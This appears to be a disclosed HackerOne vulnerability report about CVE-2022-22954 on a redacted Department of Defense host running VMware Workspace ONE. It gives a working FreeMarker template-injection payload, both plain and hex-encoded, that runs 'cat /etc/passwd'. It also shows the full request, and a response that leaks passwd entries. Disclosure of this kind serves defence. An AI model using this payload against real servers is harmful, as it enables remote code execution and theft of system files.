U.S. Dept Of Defense: ██████████ vulnerable to CVE-2022-22954

2022-04-1115:17:31

fulldash

hackerone.com

0.974 High

EPSS

Percentile

99.9%

JSON

I found that one of the targets belongs to DOD vulnerable toCVE-2022-22954 where an attacker may be able to execute any malicious code like escalating Remote code execution is also possible

Technical Summary:

CVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager. This vulnerability was assigned a CVSSv3 score of 9.8. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw.

Vulnerable URL:

https://████/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24{"freemarker.template.utility.Execute"%3Fnew()("cat %2Fetc%2Fpasswd")}

Impact

The impact of server-side template injection vulnerabilities is generally critical, resulting in remote code execution by taking full control of the back-end server. Even without the code execution, the attacker may be able to read sensitive data on the server

System Host(s)

███████

Affected Product(s) and Version(s)

VMware workspace One

CVE Numbers

CVE-2022-22954

Steps to Reproduce

Visit the vulnerable URL https://████ and Intercept the request in burp suite
Append the following endpoint /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d and analyze the response you will see the contents of**/etc/passwd**

Request:

GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1
Host: █████████
Cookie: LOGIN_XSRF=NSlYKinVNwgOtuT; JSESSIONID=A86B60C5FD0B58346764D1FB01DAF155
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Te: trailers
Connection: close

Response:

HTTP/1.1 400 
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Set-Cookie: EUC_XSRF_TOKEN=6386e149-ff55-4a34-b474-30e6c0c62299; Path=/catalog-portal; Secure
Cache-Control: no-cache,private
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Mon, 11 Apr 2022 15:03:40 GMT
Connection: close
Content-Length: 3576

&lt;!DOCTYPE HTML&gt;
&lt;html xmlns="http://www.w3.org/1999/html"&gt;
&lt;head&gt;
    &lt;title&gt;Error Page&lt;/title&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"/&gt;
    &lt;style&gt;
        body {
            background: #465361;
        }

        .error-container {
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            -ms-transform: translate(-50%, -50%);
            text-align: center;
            width: 25%;
            background-color: #fff;
            padding: 20px;
            box-shadow: 0 3px 2px -2px rgba(0, 0, .5, 0.35);
            border-radius: 4px;
        }

        .error-img-container svg {
            width: 40px;
        }

        .error-text-heading {
            font-weight: bold;
            padding-top: 5px;
            padding-bottom: 10px;
        }

        .error-text-container a {
            text-decoration: none;
        }
    &lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;
<div>
    <div>
        &lt;svg id="icon-warning-big" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 32 32"&gt;
            &lt;path d="M28.48,24.65,17.64,5.88a1.46,1.46,0,0,0-1.28-.74h0a1.46,1.46,0,0,0-1.28.74L4.25,24.64a1.48,1.48,0,0,0,1.28,2.22H27.2a1.48,1.48,0,0,0,1.28-2.21Zm-1.07.86a.24.24,0,0,1-.21.12H5.53a.24.24,0,0,1-.21-.37L16.15,6.49a.24.24,0,0,1,.21-.12h0a.24.24,0,0,1,.21.12L27.41,25.26A.23.23,0,0,1,27.41,25.51Z"
                  fill="#991700" stroke-width="0"/&gt;
            &lt;circle cx="16.36" cy="13.53" r="0.92" fill="#f38b00" stroke-width="0"/&gt;
            &lt;path d="M16.36,16.43a.62.62,0,0,0-.62.62v5.55a.62.62,0,0,0,1.23,0V17A.62.62,0,0,0,16.36,16.43Z"
                  fill="#991700" stroke-width="0"/&gt;
        &lt;/svg&gt;
    </div>
    <div>Request Failed</div>
    <div>
        <p>Please contact your IT Administrator.</p>
        <a href="/catalog-portal/ui/logout?error=&deviceUdid=$%7B%22freemarker.template.utility.Execute%22?new()(%22cat%20/etc/passwd%22)%7D">Sign Out</a>
    </div>
</div>
&lt;/body&gt;
&lt;script&gt;
    if (console && console.log) {
        console.log("auth.context.invalid");
        console.log("Authorization context is not valid. Login request  received with tenant code: ███████, device id: root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/dev/null████████
    }
&lt;/script&gt;
&lt;/html&gt;